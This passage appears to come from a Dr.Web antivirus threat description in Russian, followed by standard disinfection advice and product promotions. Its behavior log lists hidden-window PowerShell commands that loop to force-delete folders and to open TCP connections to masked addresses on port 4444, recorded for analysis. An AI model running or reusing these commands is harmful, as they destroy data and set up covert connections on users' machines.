'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\22 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\23 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\24 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\25 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\26 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\27 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\28 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\29 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\30 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\31 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\32 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\33 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\34 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\35 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\36 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\37 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\38 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\39 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\40 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\41 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\42 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\43 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\44 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\45 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\46 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\47 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\48 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){Remove-Item -Recurse -Force C:\Users\Public\49 -ErrorAction SilentlyContinue}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.100',4444);$c.GetStream()}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.101',4444);$c.GetStream()}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.102',4444);$c.GetStream()}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.103',4444);$c.GetStream()}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.104',4444);$c.GetStream()}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.105',4444);$c.GetStream()}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.106',4444);$c.GetStream()}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.107',4444);$c.GetStream()}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.108',4444);$c.GetStream()}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.109',4444);$c.GetStream()}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.110',4444);$c.GetStream()}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.111',4444);$c.GetStream()}' (with hidden window)
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Win Hidden -c while(1){$c=New-Object Net.Sockets.TCPClient('19#.#68.1.112',4444);$c.GetStream()}' (with hidden window)
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK